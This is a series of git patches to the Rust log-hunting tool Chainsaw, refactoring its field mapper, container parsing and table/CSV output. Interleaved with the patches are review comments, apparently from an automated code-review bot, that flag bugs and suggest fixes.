b/src/cli.rs index e701bf2b..b88a09e2 100644 
--- a/src/cli.rs +++ b/src/cli.rs @@ -10,7 +10,7 @@ use tau_engine::Document; use uuid::Uuid; use crate::file::Kind as FileKind; -use crate::hunt::{Detections, Group, Hunt, Kind, Mapper, Mapping}; +use crate::hunt::{Detections, Hunt, Kind}; use crate::rule::{ chainsaw::{Level, Rule as Chainsaw, Status}, Kind as RuleKind, @@ -79,7 +79,6 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String pub fn print_detections( detections: &[Detections], hunts: &[Hunt], - mappings: &[Mapping], rules: &HashMap>, column_width: u32, full: bool, @@ -111,20 +110,14 @@ pub fn print_detections( let headers = headers .entry(&hunt.group) .or_insert((vec![], HashSet::new())); - for header in &hunt.headers { - if !headers.1.contains(&header) { - (*headers).0.push(&header); - (*headers).1.insert(&header); + for field in hunt.mapper.fields() { + if field.visible && !headers.1.contains(&field.name) { + (*headers).0.push(&field.name); + (*headers).1.insert(&field.name); } } } // Build lookups - let mut groups: HashMap<&Uuid, &Group> = HashMap::new(); - for mapping in mappings { - for group in &mapping.groups { - groups.insert(&group.id, group); - } - } let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); 
@@ -236,20 +229,16 @@ pub fn print_detections( let mut hdrs = HashMap::new(); for hid in hids { let hunt = hunts.get(hid).expect("could not get hunt"); - let fields = match &hunt.kind { - crate::hunt::HuntKind::Group { .. } => { - &groups.get(&hunt.id).expect("could not get group").fields - } - crate::hunt::HuntKind::Rule { .. } => { - &rules.get(&hunt.id).expect("could not get rule").fields - } - }; - let flds: HashMap<_, _> = - fields.iter().map(|f| (&f.name, &f.from)).collect(); + let flds: HashMap<_, _> = hunt + .mapper + .fields() + .iter() + .map(|f| (&f.name, &f.from)) + .collect(); for header in &headers { if let Some(from) = flds.get(header) { - let mapper = Mapper(&hunt.mapper, &wrapper); - if let Some(value) = mapper.find(&from).and_then(|v| v.to_string()) + let mapped = hunt.mapper.mapped(&wrapper); + if let Some(value) = mapped.find(&from).and_then(|v| v.to_string()) { hdrs.insert( header, @@ -278,7 +267,6 @@ pub fn print_detections( pub fn print_csv( detections: &[Detections], hunts: &[Hunt], - mappings: &[Mapping], rules: &HashMap>, local: bool, timezone: Option, @@ -296,20 +284,14 @@ pub fn print_csv( let headers = headers .entry(&hunt.group) .or_insert((vec![], HashSet::new())); - for header in &hunt.headers { - if !headers.1.contains(&header) { - (*headers).0.push(&header); - (*headers).1.insert(&header); + for field in hunt.mapper.fields() { + if field.visible && !headers.1.contains(&field.name) { + (*headers).0.push(&field.name); + (*headers).1.insert(&field.name); } } } // Build lookups - let mut groups: HashMap<&Uuid, &Group> = HashMap::new(); - for mapping in mappings { - for group in &mapping.groups { - groups.insert(&group.id, group); - } - } let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); // Do a single unfold... 
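Review bot: `let mapped = hunt.mapper.mapped(&wrapper);` sits inside the `for header in &headers` loop, so a fresh `Mapped` with its own empty `OnceCell` cache is built for every column of every hit; for a mapping with container fields that means the container's JSON is parsed again for each header. Hoisting the line above the `for header` loop, right after `flds` is built (`let mapped = hunt.mapper.mapped(&wrapper);`), lets a single parse serve the whole row. The identical pattern is in the `print_csv` hunk (`@@ -401,20 +383,16 @@`) below and should be fixed the same way.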
@@ -401,20 +383,16 @@ pub fn print_csv( let mut hdrs = HashMap::new(); for hid in hids { let hunt = hunts.get(hid).expect("could not get hunt"); - let fields = match &hunt.kind { - crate::hunt::HuntKind::Group { .. } => { - &groups.get(&hunt.id).expect("could not get group").fields - } - crate::hunt::HuntKind::Rule { .. } => { - &rules.get(&hunt.id).expect("could not get rule").fields - } - }; - let flds: HashMap<_, _> = - fields.iter().map(|f| (&f.name, &f.from)).collect(); + let flds: HashMap<_, _> = hunt + .mapper + .fields() + .iter() + .map(|f| (&f.name, &f.from)) + .collect(); for header in &headers { if let Some(from) = flds.get(header) { - let mapper = Mapper(&hunt.mapper, &wrapper); - if let Some(value) = mapper.find(&from).and_then(|v| v.to_string()) + let mapped = hunt.mapper.mapped(&wrapper); + if let Some(value) = mapped.find(&from).and_then(|v| v.to_string()) { hdrs.insert(header, value); } diff --git a/src/hunt.rs b/src/hunt.rs index 6f323d3d..fb0d0a3d 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -6,6 +6,8 @@ use std::path::{Path, PathBuf}; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; +// https://github.com/rust-lang/rust/issues/74465 +use once_cell::unsync::OnceCell; use serde::{Deserialize, Serialize}; use serde_json::Value as Json; use tau_engine::{ @@ -16,7 +18,7 @@ use uuid::Uuid; use crate::file::{Document as File, Kind as FileKind, Reader}; use crate::rule::{ - chainsaw::{Aggregate, Field, Filter, Rule as Chainsaw}, + chainsaw::{Aggregate, Container, Field, Filter, Format, Rule as Chainsaw}, Kind as RuleKind, Rule, }; 
@@ -93,18 +95,11 @@ impl HunterBuilder { let uuid = Uuid::new_v4(); let rules = map.entry(rule.kind.clone()).or_insert(vec![]); if &rule.kind == &RuleKind::Chainsaw { - let mapper = MapperKind::from(&rule.chainsaw.fields); + let mapper = Mapper::from(rule.chainsaw.fields.clone()); hunts.push(Hunt { id: uuid.clone(), group: rule.chainsaw.group.clone(), - headers: rule - .chainsaw - .fields - .iter() - .filter_map(|f| if f.visible { Some(&f.name) } else { None }) - .cloned() - .collect(), kind: HuntKind::Rule { aggregate: rule.chainsaw.aggregate.clone(), filter: rule.chainsaw.filter.clone(), 
@@ -122,45 +117,33 @@ impl HunterBuilder { } None => HashMap::new(), }; - let mappings = match self.mappings { - Some(mut mappings) => { - mappings.sort(); - let mut scratch = vec![]; - for mapping in mappings { - let mut file = fs::File::open(mapping)?; - let mut content = String::new(); - file.read_to_string(&mut content)?; - let mut mapping: Mapping = serde_yaml::from_str(&mut content)?; - mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); - for group in &mapping.groups { - let mapper = MapperKind::from(&group.fields); - hunts.push(Hunt { - id: group.id.clone(), - - group: group.name.clone(), - headers: group - .fields - .iter() - .filter_map(|f| if f.visible { Some(&f.name) } else { None }) - .cloned() - .collect(), - kind: HuntKind::Group { - exclusions: mapping.exclusions.clone(), - filter: group.filter.clone(), - }, - timestamp: group.timestamp.clone(), + if let Some(mut mappings) = self.mappings { + mappings.sort(); + for mapping in mappings { + let mut file = fs::File::open(mapping)?; + let mut content = String::new(); + file.read_to_string(&mut content)?; + let mut mapping: Mapping = serde_yaml::from_str(&mut content)?; + mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); + for group in mapping.groups { + let mapper = Mapper::from(group.fields); + hunts.push(Hunt { + id: group.id, + + group: group.name, + kind: HuntKind::Group { + exclusions: mapping.exclusions.clone(), + filter: group.filter, + }, + timestamp: group.timestamp, - file: mapping.kind.clone(), - mapper, - rule: mapping.rules.clone(), - }); - } - scratch.push(mapping); + file: mapping.kind.clone(), + mapper, + rule: mapping.rules.clone(), + }); } - scratch } - None => vec![], - }; + } let load_unknown = self.load_unknown.unwrap_or_default(); let local = self.local.unwrap_or_default(); @@ -169,7 +152,6 @@ impl HunterBuilder { Ok(Hunter { inner: HunterInner { hunts, - mappings, rules, from: self.from.map(|d| DateTime::from_utc(d, Utc)), 
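Review bot: `group.id` is taken verbatim from the mapping file and becomes the hunt's `id`, and the printing code later keys a `HashMap` on it (`hunts.iter().map(|h| (&h.id, h)).collect()` in cli.rs), so two groups that share an id — an easy copy-paste mistake in a YAML mapping — would silently collapse into one and their hits would be attributed to the wrong group. Checking uniqueness while loading (a `HashSet<Uuid>` of seen ids and `anyhow::bail!("duplicate group id {} in mapping {}", group.id, mapping.display())` on a repeat) would turn that into a load-time error. Two nits on the same hunk: `serde_yaml::from_str(&mut content)` only needs `&content`, and the bare `?` on `fs::File::open(mapping)` drops which mapping file failed — attaching the path (`.with_context(|| …)` if anyhow's `Context` is in scope, otherwise a `map_err`) would name it.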
@@ -237,14 +219,19 @@ pub enum HuntKind { pub enum MapperKind { None, Fast(HashMap), - Full(HashMap), + Full(HashMap)>), +} + +pub struct Mapper { + fields: Vec, + kind: MapperKind, } -impl MapperKind { - pub fn from(fields: &Vec) -> Self { +impl Mapper { + pub fn from(fields: Vec) -> Self { let mut fast = false; let mut full = false; - for field in fields { + for field in &fields { if field.container.is_some() { full = true; break; 
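Review bot: `pub fn from(fields: Vec<Field>) -> Self` is an inherent method that mimics the `From` trait's method name, which clippy flags (`should_implement_trait`) and which misleads callers into expecting `Mapper::from` to be the trait impl; either `impl From<Vec<Field>> for Mapper` or rename it to `Mapper::new`. A doc comment on the new struct, e.g. `/// Owns a rule's or group's `Field` list plus a lookup table (`kind`) precomputed from whether any field uses a container.`, would also help, since `MapperKind` stays `pub` while `Mapper`'s fields are private and the relationship is not obvious from the names.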
@@ -253,20 +240,95 @@ impl MapperKind { fast = true; } } - if full { + let kind = if full { let mut map = HashMap::with_capacity(fields.len()); - for field in fields { - map.insert(field.from.clone(), field.clone()); + for field in &fields { + map.insert( + field.from.clone(), + (field.to.clone(), field.container.clone()), + ); } MapperKind::Full(map) } else if fast { let mut map = HashMap::with_capacity(fields.len()); - for field in fields { + for field in &fields { map.insert(field.from.clone(), field.to.clone()); } MapperKind::Fast(map) } else { MapperKind::None + }; + Self { fields, kind } + } + + pub fn fields(&self) -> &Vec { + &self.fields + } + + pub fn mapped<'a, D>(&'a self, document: &'a D) -> Mapped<'a> + where + D: TauDocument, + { + Mapped { + cache: OnceCell::new(), + document, + mapper: self, + } + } +} + +pub struct Mapped<'a> { + cache: OnceCell>>, + document: &'a dyn TauDocument, + mapper: &'a Mapper, +} +impl<'a> TauDocument for Mapped<'a> { + fn find(&self, key: &str) -> Option> { + match &self.mapper.kind { + MapperKind::None => self.document.find(key), + MapperKind::Fast(map) => match map.get(key) { + Some(v) => self.document.find(v), + None => self.document.find(key), + }, + MapperKind::Full(map) => match map.get(key) { + Some((v, c)) => match c { + Some(container) => { + if let Some(cache) = self.cache.get() { + return cache.get(&container.field).and_then(|hit| hit.find(v)); + } + // Due to referencing and ownership, we parse all containers at once, which + // then allows us to use a OnceCell. 
+ let mut lookup = HashMap::new(); + for field in &self.mapper.fields { + if let Some(container) = &field.container { + if !lookup.contains_key(&container.field) { + let data = match self.document.find(&container.field) { + Some(Tau::String(s)) => match container.format { + Format::Json => { + match serde_json::from_str::(&s) { + Ok(j) => Box::new(j) as Box, + Err(_) => continue, + } + } + }, + _ => continue, + }; + lookup.insert(container.field.clone(), data); + } + } + } + if let Err(_) = self.cache.set(lookup) { + panic!("cache is already set!"); + } + if let Some(cache) = self.cache.get() { + return cache.get(&container.field).and_then(|hit| hit.find(v)); + } + None + } + None => self.document.find(key), + }, + None => self.document.find(key), + }, } } } @@ -274,18 +336,16 @@ impl MapperKind { pub struct Hunt { pub id: Uuid, pub group: String, - pub headers: Vec, pub kind: HuntKind, + pub mapper: Mapper, pub timestamp: String, pub file: FileKind, - pub mapper: MapperKind, pub rule: RuleKind, } pub struct HunterInner { hunts: Vec, - mappings: Vec, rules: HashMap>, load_unknown: bool, @@ -296,22 +356,6 @@ pub struct HunterInner { to: Option>, } -//pub struct Mapper<'a>(&'a HashMap, &'a dyn TauDocument); -pub struct Mapper<'a>(pub &'a MapperKind, pub &'a dyn TauDocument); -impl<'a> TauDocument for Mapper<'a> { - fn find(&self, key: &str) -> Option> { - match &self.0 { - MapperKind::None => self.1.find(key), - MapperKind::Fast(map) => match map.get(key) { - Some(v) => self.1.find(v), - None => self.1.find(key), - }, - //MapperKind::Full(map) => unimplemented!(), - MapperKind::Full(map) => self.1.find(key), - } - } -} - pub struct Hunter { inner: HunterInner, } 
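Review bot: In the `MapperKind::Full` arm, the inner `None =>` case for a field without a container does `self.document.find(key)` — the original, unmapped key — whereas the `Fast` arm correctly looks up the mapped path `v`; as soon as a mapping contains one container field, every plain field in that mapping (for example `EventID` → `Event.System.EventID`) stops being translated and rules that depend on them silently stop matching. The arm should read `None => self.document.find(v),`. Separately, `Err(_) => continue` drops a container whose JSON fails to parse without any trace, and the later `cache.get(...)` then yields `None`, which is indistinguishable from "field absent" — malformed or truncated container data therefore produces silent misses, so at least a comment marking this as a known blind spot (or a counter surfaced to the caller) is warranted. The `get()` / `set()` / `panic!` / `get()` sequence could also be collapsed into `self.cache.get_or_init(|| { … build lookup … })`, which removes the unreachable panic.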
@@ -348,9 +392,9 @@ impl Hunter { continue; } - let mapper = Mapper(&hunt.mapper, &wrapper); + let mapped = hunt.mapper.mapped(&wrapper); - let timestamp = match mapper.find(&hunt.timestamp) { + let timestamp = match mapped.find(&hunt.timestamp) { Some(value) => match value.as_str() { Some(timestamp) => { match NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") @@ -386,17 +430,17 @@ impl Hunter { match &hunt.kind { HuntKind::Group { exclusions, filter } => { if let Some(rules) = self.inner.rules.get(&hunt.rule) { - if tau_engine::core::solve(&filter, &mapper) { + if tau_engine::core::solve(&filter, &mapped) { for (rid, rule) in rules { if exclusions.contains(&rule.name) { continue; } let hit = match &rule.filter { Filter::Detection(detection) => { - tau_engine::solve(&detection, &mapper) + tau_engine::solve(&detection, &mapped) } Filter::Expression(expression) => { - tau_engine::core::solve(&expression, &mapper) + tau_engine::core::solve(&expression, &mapped) } }; if hit { @@ -412,9 +456,9 @@ impl Hunter { } HuntKind::Rule { aggregate, filter } => { let hit = match &filter { - Filter::Detection(detection) => tau_engine::solve(&detection, &mapper), + Filter::Detection(detection) => tau_engine::solve(&detection, &mapped), Filter::Expression(expression) => { - tau_engine::core::solve(&expression, &mapper) + tau_engine::core::solve(&expression, &mapped) } }; if hit { @@ -423,7 +467,7 @@ impl Hunter { let mut hasher = DefaultHasher::new(); for field in &aggregate.fields { if let Some(value) = - mapper.find(&field).and_then(|s| s.to_string()) + mapped.find(&field).and_then(|s| s.to_string()) { value.hash(&mut hasher); } @@ -506,10 +550,6 @@ impl Hunter { &self.inner.hunts } - pub fn mappings(&self) -> &Vec { - &self.inner.mappings - } - pub fn rules(&self) -> &HashMap> { &self.inner.rules } diff --git a/src/main.rs b/src/main.rs index 2334972a..18fd7a96 100644 --- a/src/main.rs +++ b/src/main.rs 
@@ -292,21 +292,13 @@ fn run() -> Result<()> { } pb.finish(); if csv { - cli::print_csv( - &detections, - hunter.hunts(), - hunter.mappings(), - hunter.rules(), - local, - timezone, - )?; + cli::print_csv(&detections, hunter.hunts(), hunter.rules(), local, timezone)?; } else if json { cli::print_json(&detections, hunter.rules(), local, timezone)?; } else { cli::print_detections( &detections, hunter.hunts(), - hunter.mappings(), hunter.rules(), column_width.unwrap_or(40), full, diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index 37843cb8..a3adbf32 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -23,7 +23,7 @@ pub struct Aggregate { #[derive(Clone, Debug, Deserialize)] pub struct Container { - pub name: String, + pub field: String, pub format: Format, } From 1d48faa15833ca9ca032d05c148ae4710e936b39 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 12:41:43 +0100 Subject: [PATCH 10/77] refactor: clean up cli printing --- src/cli.rs | 381 ++++++++++++++++++++++++++++++++-------------------- src/hunt.rs | 9 ++ 2 files changed, 243 insertions(+), 147 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index b88a09e2..36cad43e 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -1,4 +1,4 @@ -use std::collections::{HashMap, HashSet}; +use std::collections::{hash_map::DefaultHasher, HashMap, HashSet}; use std::fs; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; @@ -6,6 +6,7 @@ use chrono_tz::Tz; use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; use prettytable::{cell, format, Row, Table}; use serde::Serialize; +use std::hash::{Hash, Hasher}; use tau_engine::Document; use uuid::Uuid; 
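Review bot: In the cli.rs import hunk, `use std::hash::{Hash, Hasher};` is inserted between the third-party `serde` and `tau_engine` imports rather than with the other `std::` imports at the top of the file, where the same commit just added `hash_map::DefaultHasher` to the `std::collections` line. Moving it to sit after `use std::fs;` keeps the std/external grouping the rest of the file uses.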
@@ -74,7 +75,16 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String data } -// FIXME: All the table stuff needs a little think due to the field complexities... +pub struct Grouping<'a> { + hits: Vec>, + kind: &'a Kind, + timestamp: &'a NaiveDateTime, +} + +pub struct Hit<'a> { + hunt: &'a Hunt, + rule: &'a Chainsaw, +} pub fn print_detections( detections: &[Detections], 
@@ -105,46 +115,60 @@ pub fn print_detections( .build(); // Build headers - let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new(); + let mut headers: HashMap<&String, (Vec, HashSet)> = HashMap::new(); for hunt in hunts { let headers = headers .entry(&hunt.group) .or_insert((vec![], HashSet::new())); + // NOTE: We only support count in aggs atm so we can inject that value in...! + if hunt.is_aggregation() { + (*headers).0.push("count".to_owned()); + (*headers).1.insert("count".to_owned()); + } for field in hunt.mapper.fields() { if field.visible && !headers.1.contains(&field.name) { - (*headers).0.push(&field.name); - (*headers).1.insert(&field.name); + (*headers).0.push(field.name.clone()); + (*headers).1.insert(field.name.clone()); } } } + let mut headers: HashMap<_, _> = headers.into_iter().map(|(k, (v, _))| (k, v)).collect(); + // Build lookups let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); - // Do a single unfold... 
>> - let mut grouped: HashMap<&String, Vec<(&NaiveDateTime, &Kind, Vec<(&Uuid, &Uuid)>)>> = - HashMap::new(); + // Unpack detections + let mut groups: HashMap<&String, Vec> = HashMap::new(); for detection in detections { - let mut tags: HashMap<&String, (&NaiveDateTime, Vec<(&Uuid, &Uuid)>)> = HashMap::new(); + let mut hits: HashMap<(&String, &NaiveDateTime), Vec> = HashMap::new(); for hit in &detection.hits { - let group = &hunts.get(&hit.hunt).expect("could not get hunt").group; - let tags = tags.entry(&group).or_insert((&hit.timestamp, vec![])); - (*tags).1.push((&hit.hunt, &hit.rule)); + let hunt = &hunts.get(&hit.hunt).expect("could not get hunt"); + let rule = &rules.get(&hit.rule).expect("could not get rule"); + let hits = hits.entry((&hunt.group, &hit.timestamp)).or_insert(vec![]); + (*hits).push(Hit { hunt, rule }); } - for (k, v) in tags { - let grouped = grouped.entry(k).or_insert(vec![]); - (*grouped).push((&v.0, &detection.kind, v.1)); + for ((group, timestamp), mut hits) in hits { + hits.sort_by(|x, y| x.rule.name.cmp(&y.rule.name)); + let groups = groups.entry(group).or_insert(vec![]); + (*groups).push(Grouping { + kind: &detection.kind, + timestamp, + hits, + }); } } - let mut keys = grouped.keys().cloned().collect::>(); + let mut keys = groups.keys().cloned().collect::>(); keys.sort(); for key in keys { - let mut grouped = grouped.remove(&key).expect("could not get grouped!"); - grouped.sort_by(|x, y| x.0.cmp(&y.0)); + let mut group = groups.remove(&key).expect("could not get grouping!"); + group.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + let mut table = Table::new(); table.set_format(format); - if let Some((headers, _)) = headers.remove(key) { + + if let Some(headers) = headers.remove(key) { let mut cells = vec![ cell!("timestamp").style_spec("c"), cell!("detections").style_spec("c"), 
@@ -157,108 +181,133 @@ pub fn print_detections( } } table.add_row(Row::new(cells)); - for (timestamp, kind, ids) in grouped { - // FIXME: Sort rules - //ids.sort(); + + for grouping in group { let localised = if let Some(timezone) = timezone { timezone - .from_local_datetime(timestamp) + .from_local_datetime(grouping.timestamp) .single() .expect("failed to localise timestamp") .to_rfc3339() } else if local { - Utc.from_local_datetime(timestamp) + Utc.from_local_datetime(grouping.timestamp) .single() .expect("failed to localise timestamp") .to_rfc3339() } else { - DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + DateTime::::from_utc(grouping.timestamp.clone(), Utc).to_rfc3339() }; - let mut cells = vec![cell!(localised)]; - if metadata { - let mut table = Table::new(); - table.add_row(Row::new(vec![ - cell!("name").style_spec("c"), - cell!("authors").style_spec("c"), - cell!("level").style_spec("c"), - cell!("status").style_spec("c"), - ])); - for (_, rid) in &ids { - let rule = rules.get(rid).expect("could not get rule"); - table.add_row(Row::new(vec![ - cell!(rule.name), - cell!(rule.authors.join("\n")), - cell!(rule.level), - cell!(rule.status), - ])); + + // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some + // corners here! 
+ let count; + let document = match grouping.kind { + Kind::Individual { document } => { + count = 1; + document } - cells.push(cell!(table)); - } else { - cells.push(cell!(ids - .iter() - .map(|(_, rid)| format!( - "{} {}", - RULE_PREFIX, - rules.get(rid).expect("could not get rule").name.as_str() - )) - .collect::>() - .join("\n"))); - } - let document = match kind { - Kind::Individual { document } => document, Kind::Aggregate { documents } => { + count = documents.len(); documents.first().expect("could not get document") } }; + + let mut rows = vec![]; + let mut seen: HashMap> = HashMap::new(); if headers.is_empty() { let json = serde_json::to_string(&document.data) .expect("could not serialise document"); - cells.push(cell!(format_field_length(&json, false, column_width))); + let rules = grouping.hits.iter().map(|hit| hit.rule).collect(); + rows.push(( + 0, + vec![cell!(format_field_length(&json, false, column_width))], + )); + seen.insert(0, rules); } else { - // This is really complicated, we could land in the same group but be from - // different hunts that have different headers, that also could even overlap... - // Because we group we won't be able to reliably handle clashes. 
- let mut hids = HashSet::new(); - for (hid, _) in &ids { - hids.insert(hid); - } let wrapper = match &document.kind { FileKind::Evtx => crate::evtx::Wrapper(&document.data), - _ => continue, + FileKind::Unknown => continue, }; - let mut hdrs = HashMap::new(); - for hid in hids { - let hunt = hunts.get(hid).expect("could not get hunt"); - let flds: HashMap<_, _> = hunt + // What we do here is hash each row since if the fields are the same but the values + // are not then we would lose data, so in this case we split the row + for hit in &grouping.hits { + let fields: HashMap<_, _> = hit + .hunt .mapper .fields() .iter() - .map(|f| (&f.name, &f.from)) + .map(|f| (&f.name, f)) .collect(); + let mut cells = vec![]; + let mut hasher = DefaultHasher::new(); for header in &headers { - if let Some(from) = flds.get(header) { - let mapped = hunt.mapper.mapped(&wrapper); - if let Some(value) = mapped.find(&from).and_then(|v| v.to_string()) - { - hdrs.insert( - header, - format_field_length(&value, full, column_width), - ); + if let Some(field) = fields.get(header) { + let mapped = hit.hunt.mapper.mapped(&wrapper); + if let Some(value) = mapped.find(&field.from) { + match value.to_string() { + Some(v) => { + v.hash(&mut hasher); + cells.push(cell!(format_field_length( + &v, + full, + column_width + ))); + } + None => { + "".hash(&mut hasher); + cells.push(cell!("")); + } + } + continue; } + } else if header == "count" { + cells.push(cell!(count)); + continue; } + cells.push(cell!("")); } + let id = hasher.finish(); + if !seen.contains_key(&id) { + rows.push((id, cells)); + } + let rules = seen.entry(id).or_insert(vec![]); + (*rules).push(hit.rule); } - for header in &headers { - if let Some(value) = hdrs.get(header) { - cells.push(cell!(value)); - } else { - cells.push(cell!("")); + } + + for (id, row) in rows { + let rules = seen.remove(&id).expect("could not get rules"); + let mut cells = vec![cell!(localised)]; + if metadata { + let mut table = Table::new(); + 
table.add_row(Row::new(vec![ + cell!("name").style_spec("c"), + cell!("authors").style_spec("c"), + cell!("level").style_spec("c"), + cell!("status").style_spec("c"), + ])); + for rule in &rules { + table.add_row(Row::new(vec![ + cell!(rule.name), + cell!(rule.authors.join("\n")), + cell!(rule.level), + cell!(rule.status), + ])); } + cells.push(cell!(table)); + } else { + cells.push(cell!(rules + .iter() + .map(|rule| format!("{} {}", RULE_PREFIX, rule.name)) + .collect::>() + .join("\n"))); } + cells.extend(row); + table.add_row(Row::new(cells)); } - table.add_row(Row::new(cells)); } } + cs_greenln!("\n[+] Group: {}", key); cs_print_table!(table); } 
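Review bot: In the new row-splitting logic of `print_detections`, `seen` and `rows` are keyed on `hasher.finish()`, a 64-bit `DefaultHasher` digest of the cell values, so two hits whose field values differ but collide on the hash are silently merged into one row and the second row's values are never shown. The cells are already materialised as strings, so keying on the values themselves removes the collision case and the hasher at once; the same construction is repeated in the `print_csv` hunk of this commit and should get the identical fix. While here, the `count` column deserves a one-line comment such as `// count is documents.len(); the field values shown come from documents.first() only`, since that asymmetry is not obvious from the output. The headers-empty branch then keys its single row with `vec![]` instead of `0`.
```rust
let mut rows = vec![];
let mut seen: HashMap<Vec<String>, Vec<&Chainsaw>> = HashMap::new();
// … unchanged: headers.is_empty() branch, using `vec![]` as the key instead of 0 …
for hit in &grouping.hits {
    // … unchanged: `fields` lookup …
    let mut cells = vec![];
    let mut key = vec![];
    for header in &headers {
        if let Some(field) = fields.get(header) {
            let mapped = hit.hunt.mapper.mapped(&wrapper);
            if let Some(value) = mapped.find(&field.from) {
                match value.to_string() {
                    Some(v) => {
                        key.push(v.clone());
                        cells.push(cell!(format_field_length(&v, full, column_width)));
                    }
                    None => {
                        key.push(String::new());
                        cells.push(cell!(""));
                    }
                }
                continue;
            }
        } else if header == "count" {
            cells.push(cell!(count));
            continue;
        }
        key.push(String::new());
        cells.push(cell!(""));
    }
    if !seen.contains_key(&key) {
        rows.push((key.clone(), cells));
    }
    seen.entry(key).or_insert_with(Vec::new).push(hit.rule);
}
// … unchanged: `for (key, row) in rows` output loop, now calling `seen.remove(&key)` …
```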
@@ -278,48 +327,65 @@ pub fn print_csv( .expect("could not get output directory") }; fs::create_dir_all(directory)?; + // Build headers - let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new(); + let mut headers: HashMap<&String, (Vec, HashSet)> = HashMap::new(); for hunt in hunts { let headers = headers .entry(&hunt.group) .or_insert((vec![], HashSet::new())); + // NOTE: We only support count in aggs atm so we can inject that value in...! + if hunt.is_aggregation() { + (*headers).0.push("count".to_owned()); + (*headers).1.insert("count".to_owned()); + } for field in hunt.mapper.fields() { if field.visible && !headers.1.contains(&field.name) { - (*headers).0.push(&field.name); - (*headers).1.insert(&field.name); + (*headers).0.push(field.name.clone()); + (*headers).1.insert(field.name.clone()); } } } + let mut headers: HashMap<_, _> = headers.into_iter().map(|(k, (v, _))| (k, v)).collect(); + // Build lookups let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); - // Do a single unfold... 
- let mut grouped: HashMap<&String, Vec<(&NaiveDateTime, &Kind, Vec<(&Uuid, &Uuid)>)>> = - HashMap::new(); + + // Unpack detections + let mut groups: HashMap<&String, Vec> = HashMap::new(); for detection in detections { - let mut tags: HashMap<&String, (&NaiveDateTime, Vec<(&Uuid, &Uuid)>)> = HashMap::new(); + let mut hits: HashMap<(&String, &NaiveDateTime), Vec> = HashMap::new(); for hit in &detection.hits { - let group = &hunts.get(&hit.hunt).expect("could not get hunt").group; - let tags = tags.entry(&group).or_insert((&hit.timestamp, vec![])); - (*tags).1.push((&hit.hunt, &hit.rule)); + let hunt = &hunts.get(&hit.hunt).expect("could not get hunt"); + let rule = &rules.get(&hit.rule).expect("could not get rule"); + let hits = hits.entry((&hunt.group, &hit.timestamp)).or_insert(vec![]); + (*hits).push(Hit { hunt, rule }); } - for (k, v) in tags { - let grouped = grouped.entry(k).or_insert(vec![]); - (*grouped).push((&v.0, &detection.kind, v.1)); + for ((group, timestamp), mut hits) in hits { + hits.sort_by(|x, y| x.rule.name.cmp(&y.rule.name)); + let groups = groups.entry(group).or_insert(vec![]); + (*groups).push(Grouping { + kind: &detection.kind, + timestamp, + hits, + }); } } - let mut keys = grouped.keys().cloned().collect::>(); + + let mut keys = groups.keys().cloned().collect::>(); keys.sort(); for key in keys { - let mut grouped = grouped.remove(&key).expect("could not get grouped!"); - grouped.sort_by(|x, y| x.0.cmp(&y.0)); + let mut group = groups.remove(&key).expect("could not get grouping!"); + group.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + // FIXME: Handle name clashes let filename = format!("{}.csv", key.replace(" ", "_").to_lowercase()); let path = directory.join(&filename); let mut csv = prettytable::csv::Writer::from_path(path)?; cs_eprintln!("[+] Created {}", filename); - if let Some((headers, _)) = headers.remove(key) { + + if let Some(headers) = headers.remove(key) { let mut cells = vec!["timestamp", "detections"]; if 
headers.is_empty() { cells.push("data"); 
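Review bot: The new `// FIXME: Handle name clashes` above `let filename = format!("{}.csv", key.replace(" ", "_").to_lowercase());` flags collisions, but the larger gap is that `key` is a hunt group name that appears to come straight from the loaded mapping/rule files and is passed to `directory.join(&filename)` unchanged, so a group containing `/`, `\` or `..` would write outside the requested output directory. Restricting the name to a safe character set addresses both issues at once, e.g. `let safe: String = key.chars().map(|c| if c.is_ascii_alphanumeric() { c.to_ascii_lowercase() } else { '_' }).collect();` followed by `let filename = format!("{}.csv", safe);`, with a numeric suffix when the path already exists. Whether group names can be influenced by anything other than the operator's own mapping files is not visible here, so the practical risk may be low, but the check is cheap and the FIXME can then be dropped.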
